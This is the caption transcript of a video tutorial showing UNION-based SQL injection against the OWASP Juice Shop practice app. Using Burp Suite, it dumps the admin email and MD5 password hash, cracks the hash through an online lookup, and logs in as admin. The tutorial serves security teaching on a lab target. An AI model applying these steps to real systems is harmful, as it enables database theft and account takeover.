Advanced SQL Injection Tutorial! Learn From A Pro Hacker Now!

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

welcome back to another episode on how to hack and today we'll be learning about hacking into databases and finally be able to pull out all the critical sensitive data like usernames passwords and at least goes on [Music] and this is using a slightly more advanced method in structured query language injection sql injection so right in front of us i have open web application security project juice shop running so this is a vulnerable web application system for us to run all of our hacking techniques on and once more big disclaimer all right hacking is illegal if you want to do it do it either in your own home lab environment or check out those bug monthly programs that's available for all these websites that you would like to test on make sure that they got a legitimate bug bounty program else you may end up crashing someone's website application or even dropping table which is absolutely horrendous okay so make sure you check on that first so going back to the tutorial here i have the juice shop so this is an e-commerce site and there's all these different products and we have apple juice apple pomades banana juice and at least goes on so i can go to the top right corner and i can click on the settings click on web developer and click on the network tab so this will bring up network tab for us and i can see right here i can do a refresh and we can see all the calls that are being made into the website and this is important because if we want to understand the structure of the website how all the different calls are made and how we're going to be able to run all our tests on all payloads on this is going to be one of those places that you want to look out for on top of the url the search function and so on so of course if i scroll down you can see here we have different kind of files that got downloaded so we have main es 2015.js so javascript all right and so on and we have of course api challengers all right so api stands for application programming interfaces so we're going to be able to interact with them and of course if i scroll down further we have api quantities and we have search so i can click under search and you can see right here okay on the bottom right side we have get all right followed by the url and of course in the real world you'll be going after a specific domain name all right and then of course specific port numbers if any else it will default into either http or https and right at the back you can see here we have a question mark q equal okay so this is the part where you can inject any of your searchers into and through the rest right so red stands for representation of state transfer and then once you do that we'll be able to pick up those information and so on so the top right corner click on the foxy proxy click on the burp suite so we'll turn on our proxy to intercept our request so now i can go to the top left corner and i can click on terminal all right so once i'm on terminal i can go ahead and turn on purposes so let's go ahead and enter burp suite all right and start this up so now we're starting our burp suite community edition okay so we have here community edition right here click next and click start burp using verb defaults so burp suite is going to be our interceptor where we can manipulate the data change the information and then amend those details and send it over to the site to see if there are any structured query language vulnerability so these are openings for us to hijack into the system so now i can go under the proxy tab and ensure that the intercept is on okay so what i can do now is to go back and do a refresh all right so here we go the following so this is an interception get slash so we'll follow that socket i o res admin application assets socket io res admin application configuration api challenges res languages api challenges again rest admin all right application configuration quantities okay and this is the one that we're targeting today so we have get slash rest slash product slash search so do a right click on this and send it over into repeater so now i click on the repeater tab and you can see here on the left side with requests and then on the center we have the response and the most right side with inspector so this is a wonderful way for us to actually launch our attacks on and know and understand what kind of responses are coming back from the server or from the system so here on the left side i can go ahead and enter a particular value right so in this case in search question mark q equal i can enter apple and let's go ahead and send and see what happens so i'll click send and we can see over here we got a response http slash 1.1 200 okay and if i scroll down further we can see here status success and we got a couple of items so we got id1 we got apple juice okay and of course we've got id24 epiphomes so we got two items being returned as a result of searching so this is a critical part of any penetration testing is that we're trying to find what is considered normal what is a logical behavior of a website whenever we do a normal search so we get back results and we want to also understand right down to the file and in this case on the result section we can see here this is a return of a javascript object notation json all right so you have status success we have data and here we have id one name description price deluxe price image created at updated at and deleted that so what does all this mean all right so we have one two three four five six seven eight nine so we got nine results coming out from this json so what does it mean for us is that we whenever we're doing any kind of search query function and we found vulnerability and we want to pull data out of the system we have to ensure that whatever we are returning is going to fit into those nine columns okay and of course if it doesn't fit into nine columns then we'll get an error so here okay we have done all sorts of testing and can do all this testing using intruder as a function to check for vulnerabilities particularly in the area of sql injection where you have a list of payloads and from the list of payloads you can easily send them over into the web application system to find those vulnerabilities so we got a couple payloads here and the first part is the idea about what we're trying to inject so we're trying to union the table by combining and joining tables so that when we return the result we can actually get back values of another table and of course at the bottom size you can see here i have union all right and then we have select id email password followed by four five six seven eight nine so exactly is what i mentioned earlier which is the whole idea about ensuring that whatever is returned from the union table is that we can fit right back into the nine columns so if i copy this right here and i do a right-click copy and i go back into brep suite so what i can do now is to change the query parameter value of q so double click on this and i can change the value over here so this is the payload that we have created click apply changes all right so we have the changes now being applied and what i can do now is go ahead and click send in three two one click send and we got the following feedback that's it all right by the way that's it it's game over we are in we got all the details and all of the results right here and this is really really scary stuff because very quickly we're able to uncover all these different details as i scroll down further the first part is apple juice the second part is admin this is literally an admin account over here and of course if you go back into the union selector you can see id email and password so the first field is ids one the name which is the email field and the description is actually the password so in this case we got admin all right so this is the email address so i can do a right-click and i can copy this all right and we can paste it back into say mousepad all right so i can paste it over here and of course going back to burp suite we got a password view here and i can do a right click i can copy this and i can go back into mousepad and i can paste this hashtag value here so without even doing any kind of technical analysis i'm able to understand that this is a hashtag value and what i can do now is do a copy of this hash value i go into any of your browser any of your favorite browser whichever the case is i turn off burp suite all right i turn off the foxy proxy i go to any search engine and all i got to do now is just paste the hashtag value over here click google search and immediately on the first calculation md5.grommet.com so go ahead and click on it and right here we got a following okay convert a string all right to a md5 hash and this is the password right here admin one two three all right so this is the value that we've inserted we reverse it and we got back admin one two three as the password so how can we ascertain this right how can we confirm that we truly got a username password go back to owsp juice shop all right i'll close the network tab click on your account click login and now all i got to do is to go ahead and enter okay in this case we got over here right admin one two three is the password so i can copy the email address go back to the login screen okay paste it right here go back to mousepad and now i can copy the password view i can go ahead and copy this go back to owsp juice shop on any of those websites and click login oh my goodness we are in look at the top right corner right here admin at juice shop so we are in we get full control of the entire user profile we can change the username we can change the email address we can change the password field we can change all of those things so really quickly you are able now to actually see all these different kind of hacking techniques and how we can join multiple tables together because the first table that you're targeting is actually the product table but what we're trying to find out is are there any other sensitive tables say for example like the user table the other tables that may contain personal information credit card details financial transaction records and at least goes on and it's important of course if you're storing all this different kind of sensitive data you want to ensure that your encryption keys and your hashtag values are also being sorted so this is a key way of separation of duty to make it a lot harder for hackers to break in directly into a database if there's a vulnerability at the application layer so once again i hope you've learned something valuable in today's tutorial and if you have any questions feel free to leave a comment below and i'll try my best to answer any of your questions remember like share subscribe and turn on notification so that you can be kept abreast of the latest cyber security tutorial thanks so much once again for watching

Info

Channel: Loi Liang Yang

Views: 36,343

Rating: undefined out of 5

Keywords: hacker, hacking, cracker, cracking, kali linux, kali, metasploit, ethical hacking, ethical hacker, penetration testing, penetration tester, owasp, sqli

Id: lkOBvy4bRr4

Channel Id: undefined

Length: 10min 16sec (616 seconds)

Published: Sat Jun 26 2021